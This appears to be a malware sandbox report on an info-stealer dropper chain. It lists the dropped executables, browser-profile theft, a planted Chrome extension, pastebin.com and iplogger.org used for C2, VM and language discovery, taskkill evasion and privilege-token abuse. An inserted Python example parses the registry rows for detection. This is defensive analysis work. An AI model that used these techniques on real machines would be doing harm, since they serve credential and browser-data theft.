N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up geolocation information via web service

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
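
The four registry tables above (location, language, SCSI and system info) list every process that touched a flagged key, and a plain read of them overstates the sample: the QEMU DVD-ROM hardware IDs and the BIOS values are read by dwm.exe and chrome.exe, which do that on any Windows host, while the dropped Tue1968b7ee9058232e8.exe only opens and enumerates Enum\SCSI. The Python below is an added example, not part of the report: it parses "Description Indicator Process Target" rows, maps each key to a discovery category, drops the known-noisy system binaries, and separately lists the hypervisor-revealing values regardless of who read them. The rows are copied from the tables above; the category labels, ATT&CK mapping and noise list are this example's own choices.

```python
"""Classify the registry-discovery rows of a sandbox signature table and
separate the sample's own checks from system-process noise. Added example,
not part of the report; rows below are copied from this page, the category
labels, ATT&CK mapping and noise list are this example's own choices."""
import re
from collections import defaultdict

# One row of a "Description Indicator Process Target" table. Indicator and
# process may both contain spaces, so the lazy groups are anchored on the
# drive letter of the process path and the trailing N/A target.
ROW_RE = re.compile(
    r"^(?P<action>Key value queried|Key queried|Key opened|Key enumerated|Key created)\s+"
    r"(?P<key>\\REGISTRY\\.+?)\s+(?P<process>[A-Za-z]:\\.+?)\s+N/A$"
)

# Registry paths the sandbox flags and what an access to them means.
CATEGORIES = [
    (r"\\Control Panel\\International\\Geo\\Nation$", "location check (T1614)"),
    (r"\\Control\\NLS\\Language$", "language discovery (T1614.001)"),
    (r"\\Enum\\SCSI", "storage/hypervisor enumeration (T1082)"),
    (r"\\HARDWARE\\DESCRIPTION\\System\\BIOS", "BIOS/system info (T1082)"),
]
# Vendor strings in SCSI device IDs that give away a virtual machine.
VM_VENDORS = ("QEMU", "VBOX", "VMWARE", "VIRTIO", "XEN")
# Binaries that read these keys on every Windows host; keep for context,
# never alert on them.
SYSTEM_NOISE = {
    r"c:\windows\system32\dwm.exe",
    r"c:\program files\google\chrome\application\chrome.exe",
}


def classify(key):
    for pattern, label in CATEGORIES:
        if re.search(pattern, key, re.IGNORECASE):
            return label
    return "uncategorised"


def parse_rows(text):
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        key, proc = m["key"], m["process"]
        rows.append({
            "action": m["action"],
            "key": key,
            "process": proc,
            "category": classify(key),
            "vm_artifact": any(v in key.upper() for v in VM_VENDORS),
            "noise": proc.lower() in SYSTEM_NOISE,
        })
    return rows


def discovery_by_process(rows):
    """Map each non-noise process to the discovery categories it performed."""
    out = defaultdict(set)
    for r in rows:
        if not r["noise"]:
            out[r["process"]].add(r["category"])
    return dict(out)


def vm_artifacts(rows):
    """Registry values that expose the hypervisor, whoever read them."""
    return sorted({r["key"] for r in rows if r["vm_artifact"]})


# Rows copied from the tables above.
SAMPLE_ROWS = r"""
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
"""

if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for proc, cats in discovery_by_process(rows).items():
        print(proc, "->", ", ".join(sorted(cats)))
    print("hypervisor artifacts:", vm_artifacts(rows))
```

mshta.exe and cmd.exe are kept on purpose: they are living-off-the-land hosts spawned by the chain, so their reads are attributable to the sample even though the binaries are Microsoft's. The vm_artifacts list is worth checking whether or not the sample read those values, because a sample that enumerates Enum\SCSI has the device names available and a sandbox on QEMU will expose them.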

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331518534095" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
